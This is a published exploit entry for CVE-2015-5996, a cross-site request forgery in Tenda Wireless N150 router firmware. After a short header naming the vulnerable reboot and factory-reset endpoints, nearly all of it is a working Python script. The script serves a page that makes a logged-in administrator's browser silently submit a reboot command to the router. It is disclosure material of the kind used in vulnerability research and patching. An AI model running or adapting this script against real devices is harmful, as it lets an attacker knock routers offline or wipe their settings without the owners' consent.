# Exploit Title: Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)# Date: 2018-07-21# Exploit Author: Nathu Nandwani# Website: http://nandtech.co# CVE: CVE-2015-5996## Description:## The router is vulnerable to a cross-site request forgery attacker. # If an administrator is currently logged in and visits a # remote webpage containing forms existing in the router's firmware, # a request can be forged to modify existing settings or even # set the router to its default state.## These are two examples that can work in the proof of concept: # /goform/SysToolReboot - Reboot the router# /goform/SysToolRestoreSet - Set the router to default settings## Reference: https://www.kb.cert.org/vuls/id/630872import socket
server_ip ="0.0.0.0"
server_port =80
router_ip ="192.168.0.1"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)print"Currently listening at "+ server_ip +":"+str(server_port)
client,(client_host, client_port)= sock.accept()print"Client connected: "+ client_host +":"+str(client_port)print""print client.recv(1000)
client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')
client.send("""
<html>
<body>
<form method="post" id="frmSetup" name="frmSetup" action="http://"""+ router_ip +"""/goform/SysToolReboot">
<input name="CMD" value="SYS_CONF" type="hidden">
<input name="GO" value="system_reboot.asp" type="hidden">
<input name="CCMD" value="0" type="hidden">
</form>
<script>
document.getElementById("frmSetup").submit();
</script>
</body>
</html>
""")
client.close()
sock.close()
